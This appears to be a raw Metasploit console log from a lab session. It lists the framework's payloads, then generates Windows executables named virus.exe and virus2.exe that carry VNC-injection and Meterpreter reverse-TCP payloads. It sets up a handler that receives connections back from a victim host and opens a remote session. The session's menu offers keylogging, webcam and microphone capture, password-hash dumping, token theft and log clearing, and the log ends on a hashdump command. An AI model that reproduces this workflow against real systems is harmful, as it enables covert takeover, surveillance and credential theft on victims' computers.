       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12644 updated today (2011.05.17)

msf > show payloads

Payloads
========

   Name                                           Disclosure Date  Rank    Description
   ----                                           ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                          normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                         normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                          normal  AIX execve shell for inetd
   aix/ppc/shell_reverse_tcp                                       normal  AIX Command Shell, Reverse TCP Inline
   bsd/sparc/shell_bind_tcp                                        normal  BSD Command Shell, Bind TCP Inline
   bsd/sparc/shell_reverse_tcp                                     normal  BSD Command Shell, Reverse TCP Inline
   bsd/x86/exec                                                    normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                                         normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                                      normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_tcp                                          normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/find_tag                                          normal  BSD Command Shell, Find Tag Stager
   bsd/x86/shell/reverse_tcp                                       normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                                          normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_find_port                                         normal  BSD Command Shell, Find Port Inline
   bsd/x86/shell_find_tag                                          normal  BSD Command Shell, Find Tag Inline
   bsd/x86/shell_reverse_tcp                                       normal  BSD Command Shell, Reverse TCP Inline
   bsdi/x86/shell/bind_tcp                                         normal  BSDi Command Shell, Bind TCP Stager
   bsdi/x86/shell/reverse_tcp                                      normal  BSDi Command Shell, Reverse TCP Stager
   bsdi/x86/shell_bind_tcp                                         normal  BSDi Command Shell, Bind TCP Inline
   bsdi/x86/shell_find_port                                        normal  BSDi Command Shell, Find Port Inline
   bsdi/x86/shell_reverse_tcp                                      normal  BSDi Command Shell, Reverse TCP Inline
   cmd/unix/bind_inetd                                             normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_netcat                                            normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_perl                                              normal  Unix Command Shell, Bind TCP (via perl)
   cmd/unix/bind_ruby                                              normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/generic                                                normal  Unix Command, Generic command execution
   cmd/unix/interact                                               normal  Unix Command, Interact with established connection
   cmd/unix/reverse                                                normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_bash                                           normal  Unix Command Shell, Reverse TCP (/dev/tcp)
   cmd/unix/reverse_netcat                                         normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_perl                                           normal  Unix Command Shell, Reverse TCP (via perl)
   cmd/unix/reverse_ruby                                           normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/windows/adduser                                             normal  Windows Execute net user /ADD CMD
   cmd/windows/bind_perl                                           normal  Windows Command Shell, Bind TCP (via perl)
   cmd/windows/bind_ruby                                           normal  Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_exec_vbs                                   normal  Windows Executable Download and Execute (via .vbs)
   cmd/windows/reverse_perl                                        normal  Windows Command, Double reverse TCP connection (via perl)
   cmd/windows/reverse_ruby                                        normal  Windows Command Shell, Reverse TCP (via Ruby)
   generic/debug_trap                                              normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                          normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                       normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                              normal  Generic x86 Tight Loop
   java/jsp_shell_bind_tcp                                         normal  Java JSP Command Shell, Bind TCP Inline
   java/jsp_shell_reverse_tcp                                      normal  Java JSP Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                                       normal  Java Meterpreter, Java Bind TCP stager
   java/meterpreter/reverse_tcp                                    normal  Java Meterpreter, Java Reverse TCP stager
   java/shell/bind_tcp                                             normal  Command Shell, Java Bind TCP stager
   java/shell/reverse_tcp                                          normal  Command Shell, Java Reverse TCP stager
   linux/armle/adduser                                             normal  Linux Add User
   linux/armle/exec                                                normal  Linux Execute Command
   linux/armle/shell_reverse_tcp                                   normal  Linux Command Shell, Reverse TCP Inline
   linux/mipsbe/shell_reverse_tcp                                  normal  Linux Command Shell, Reverse TCP Inline
   linux/mipsle/shell_reverse_tcp                                  normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc/shell_bind_tcp                                        normal  Linux Command Shell, Bind TCP Inline
   linux/ppc/shell_find_port                                       normal  Linux Command Shell, Find Port Inline
   linux/ppc/shell_reverse_tcp                                     normal  Linux Command Shell, Reverse TCP Inline
   linux/ppc64/shell_bind_tcp                                      normal  Linux Command Shell, Bind TCP Inline
   linux/ppc64/shell_find_port                                     normal  Linux Command Shell, Find Port Inline
   linux/ppc64/shell_reverse_tcp                                   normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/adduser                                               normal  Linux Add User
   linux/x86/chmod                                                 normal  Linux Chmod
   linux/x86/exec                                                  normal  Linux Execute Command
   linux/x86/meterpreter/bind_ipv6_tcp                             normal  Linux Meterpreter, Bind TCP Stager (IPv6)
   linux/x86/meterpreter/bind_tcp                                  normal  Linux Meterpreter, Bind TCP Stager
   linux/x86/meterpreter/find_tag                                  normal  Linux Meterpreter, Find Tag Stager
   linux/x86/meterpreter/reverse_ipv6_tcp                          normal  Linux Meterpreter, Reverse TCP Stager (IPv6)
   linux/x86/meterpreter/reverse_tcp                               normal  Linux Meterpreter, Reverse TCP Stager
   linux/x86/metsvc_bind_tcp                                       normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp                                    normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/shell/bind_ipv6_tcp                                   normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_tcp                                        normal  Linux Command Shell, Bind TCP Stager
   linux/x86/shell/find_tag                                        normal  Linux Command Shell, Find Tag Stager
   linux/x86/shell/reverse_ipv6_tcp                                normal  Linux Command Shell, Reverse TCP Stager (IPv6)
   linux/x86/shell/reverse_tcp                                     normal  Linux Command Shell, Reverse TCP Stager
   linux/x86/shell_bind_ipv6_tcp                                   normal  Linux Command Shell, Bind TCP Inline (IPv6)
   linux/x86/shell_bind_tcp                                        normal  Linux Command Shell, Bind TCP Inline
   linux/x86/shell_find_port                                       normal  Linux Command Shell, Find Port Inline
   linux/x86/shell_find_tag                                        normal  Linux Command Shell, Find Tag Inline
   linux/x86/shell_reverse_tcp                                     normal  Linux Command Shell, Reverse TCP Inline
   linux/x86/shell_reverse_tcp2                                    normal  Linux Command Shell, Reverse TCP Inline - Metasm demo
   netware/shell/reverse_tcp                                       normal  NetWare Command Shell, Reverse TCP Stager
   osx/armle/execute/bind_tcp                                      normal  OSX Write and Execute Binary, Bind TCP Stager
   osx/armle/execute/reverse_tcp                                   normal  OSX Write and Execute Binary, Reverse TCP Stager
   osx/armle/shell/bind_tcp                                        normal  OSX Command Shell, Bind TCP Stager
   osx/armle/shell/reverse_tcp                                     normal  OSX Command Shell, Reverse TCP Stager
   osx/armle/shell_bind_tcp                                        normal  OSX Command Shell, Bind TCP Inline
   osx/armle/shell_reverse_tcp                                     normal  OSX Command Shell, Reverse TCP Inline
   osx/armle/vibrate                                               normal  OSX iPhone Vibrate
   osx/ppc/shell/bind_tcp                                          normal  OSX Command Shell, Bind TCP Stager
   osx/ppc/shell/find_tag                                          normal  OSX Command Shell, Find Tag Stager
   osx/ppc/shell/reverse_tcp                                       normal  OSX Command Shell, Reverse TCP Stager
   osx/ppc/shell_bind_tcp                                          normal  OSX Command Shell, Bind TCP Inline
   osx/ppc/shell_reverse_tcp                                       normal  OSX Command Shell, Reverse TCP Inline
   osx/x86/bundleinject/bind_tcp                                   normal  Mac OS X Inject Mach-O Bundle, Bind TCP Stager
   osx/x86/bundleinject/reverse_tcp                                normal  Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
   osx/x86/exec                                                    normal  OSX Execute Command
   osx/x86/isight/bind_tcp                                         normal  Mac OS X x86 iSight photo capture, Bind TCP Stager
   osx/x86/isight/reverse_tcp                                      normal  Mac OS X x86 iSight photo capture, Reverse TCP Stager
   osx/x86/shell_bind_tcp                                          normal  OSX Command Shell, Bind TCP Inline
   osx/x86/shell_find_port                                         normal  OSX Command Shell, Find Port Inline
   osx/x86/shell_reverse_tcp                                       normal  OSX Command Shell, Reverse TCP Inline
   osx/x86/vforkshell/bind_tcp                                     normal  OSX (vfork) Command Shell, Bind TCP Stager
   osx/x86/vforkshell/reverse_tcp                                  normal  OSX (vfork) Command Shell, Reverse TCP Stager
   osx/x86/vforkshell_bind_tcp                                     normal  OSX (vfork) Command Shell, Bind TCP Inline
   osx/x86/vforkshell_reverse_tcp                                  normal  OSX (vfork) Command Shell, Reverse TCP Inline
   php/bind_perl                                                   normal  PHP Command Shell, Bind TCP (via perl)
   php/bind_php                                                    normal  PHP Command Shell, Bind TCP (via php)
   php/download_exec                                               normal  PHP Executable Download and Execute
   php/exec                                                        normal  PHP Execute Command
   php/meterpreter/bind_tcp                                        normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/reverse_tcp                                     normal  PHP Meterpreter, PHP Reverse TCP stager
   php/meterpreter_reverse_tcp                                     normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                                                normal  PHP Command, Double reverse TCP connection (via perl)
   php/reverse_php                                                 normal  PHP Command Shell, Reverse TCP (via php)
   php/shell_findsock                                              normal  PHP Command Shell, Find Sock
   solaris/sparc/shell_bind_tcp                                    normal  Solaris Command Shell, Bind TCP Inline
   solaris/sparc/shell_find_port                                   normal  Solaris Command Shell, Find Port Inline
   solaris/sparc/shell_reverse_tcp                                 normal  Solaris Command Shell, Reverse TCP Inline
   solaris/x86/shell_bind_tcp                                      normal  Solaris Command Shell, Bind TCP Inline
   solaris/x86/shell_find_port                                     normal  Solaris Command Shell, Find Port Inline
   solaris/x86/shell_reverse_tcp                                   normal  Solaris Command Shell, Reverse TCP Inline
   tty/unix/interact                                               normal  Unix TTY, Interact with established connection
   windows/adduser                                                 normal  Windows Execute net user /ADD
   windows/dllinject/bind_ipv6_tcp                                 normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                 normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                      normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/find_tag                                      normal  Reflective Dll Injection, Find Tag Ordinal Stager
   windows/dllinject/reverse_http                                  normal  Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
   windows/dllinject/reverse_ipv6_tcp                              normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                              normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                               normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                   normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                          normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                               normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                           normal  Windows Executable Download and Execute
   windows/exec                                                    normal  Windows Execute Command
   windows/messagebox                                              normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                               normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                               normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/find_tag                                    normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
   windows/meterpreter/reverse_http                                normal  Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/meterpreter/reverse_https                               normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_tcp                            normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                            normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                             normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                        normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                             normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                         normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                      normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                          normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                          normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                               normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/find_tag                               normal  Windows Inject DLL, Find Tag Ordinal Stager
   windows/patchupdllinject/reverse_ipv6_tcp                       normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                       normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                        normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                            normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                   normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                        normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                        normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                             normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/find_tag                             normal  Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                     normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                     normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                      normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                          normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                 normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                      normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                     normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                     normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                          normal  Windows Command Shell, Bind TCP Stager
   windows/shell/find_tag                                          normal  Windows Command Shell, Find Tag Ordinal Stager
   windows/shell/reverse_http                                      normal  Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
   windows/shell/reverse_ipv6_tcp                                  normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                  normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                   normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                       normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                              normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                   normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                          normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                     normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                       normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                             normal  Windows Speech API - Say You Got Pwned!
   windows/upexec/bind_ipv6_tcp                                    normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                    normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/find_tag                                         normal  Windows Upload/Execute, Find Tag Ordinal Stager
   windows/upexec/reverse_http                                     normal  Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
   windows/upexec/reverse_ipv6_tcp                                 normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                 normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                  normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                             normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                  normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                 normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                 normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/find_tag                                      normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
   windows/vncinject/reverse_http                                  normal  VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/vncinject/reverse_ipv6_tcp                              normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                              normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                               normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                          normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                               normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/x64/exec                                                normal  Windows x64 Execute Command
   windows/x64/meterpreter/bind_tcp                                normal  Windows x64 Meterpreter, Windows x64 Bind TCP Stager
   windows/x64/meterpreter/reverse_tcp                             normal  Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
   windows/x64/shell/bind_tcp                                      normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
   windows/x64/shell/reverse_tcp                                   normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   windows/x64/shell_bind_tcp                                      normal  Windows x64 Command Shell, Bind TCP Inline
   windows/x64/shell_reverse_tcp                                   normal  Windows x64 Command Shell, Reverse TCP Inline
   windows/x64/vncinject/bind_tcp                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   windows/x64/vncinject/reverse_tcp                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > use windows/vncinject/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(reverse_tcp) > generate -f virus.exe -t exe
[*] Writing 73802 bytes to virus.exe...
msf payload(reverse_tcp) > ls -al virus.exe
[*] exec: ls -al virus.exe
-rwx------+ 1 ByJJoon None 73802 May 18 06:38 virus.exe
msf payload(reverse_tcp) > file virus.exe
[*] exec: file virus.exe
virus.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 192.168.109.128
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(handler) >
msf exploit(handler) > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -f virus2.exe -t exe
[*] Writing 73802 bytes to virus2.exe...
msf payload(reverse_tcp) > ls -al virus2.exe
[*] exec: ls -al virus2.exe
-rwx------+ 1 ByJJoon None 73802 May 18 06:50 virus2.exe
msf payload(reverse_tcp) > file virus2.exe
[*] exec: file virus2.exe
virus2.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.109.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.109.128
[*] Meterpreter session 2 opened (192.168.109.1:4444 -> 192.168.109.128:1074) at 2011-05-18 06:51:23 +0900
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    info          Displays information about a Post module
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    load          Load one or more meterpreter extensions
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    use           Deprecated alias for 'load'
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command     Description
    -------     -----------
    cat         Read the contents of a file to the screen
    cd          Change directory
    del         Delete the specified file
    download    Download a file or directory
    edit        Edit a file
    getlwd      Print local working directory
    getwd       Print working directory
    lcd         Change local working directory
    lpwd        Print local working directory
    ls          List files
    mkdir       Make directory
    pwd         Print working directory
    rm          Delete the specified file
    rmdir       Remove directory
    search      Search for files
    upload      Upload a file or directory


Stdapi: Networking Commands
===========================

    Command     Description
    -------     -----------
    ipconfig    Display interfaces
    portfwd     Forward a local port to a remote service
    route       View and modify the routing table


Stdapi: System Commands
=======================

    Command        Description
    -------        -----------
    clearev        Clear the event log
    drop_token     Relinquishes any active impersonation token.
    execute        Execute a command
    getpid         Get the current process identifier
    getprivs       Attempt to enable all privileges available to the current process
    getuid         Get the user that the server is running as
    kill           Terminate a process
    ps             List running processes
    reboot         Reboots the remote computer
    reg            Modify and interact with the remote registry
    rev2self       Calls RevertToSelf() on the remote machine
    shell          Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    sysinfo        Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command          Description
    -------          -----------
    enumdesktops     List all accessible desktops and window stations
    getdesktop       Get the current meterpreter desktop
    idletime         Returns the number of seconds the remote user has been idle
    keyscan_dump     Dump the keystroke buffer
    keyscan_start    Start capturing keystrokes
    keyscan_stop     Stop capturing keystrokes
    screenshot       Grab a screenshot of the interactive desktop
    setdesktop       Change the meterpreters current desktop
    uictl            Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

    Command      Description
    -------      -----------
    getsystem    Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command     Description
    -------     -----------
    hashdump    Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command      Description
    -------      -----------
    timestomp    Manipulate file MACE attributes

meterpreter > hashdump
meterpreter >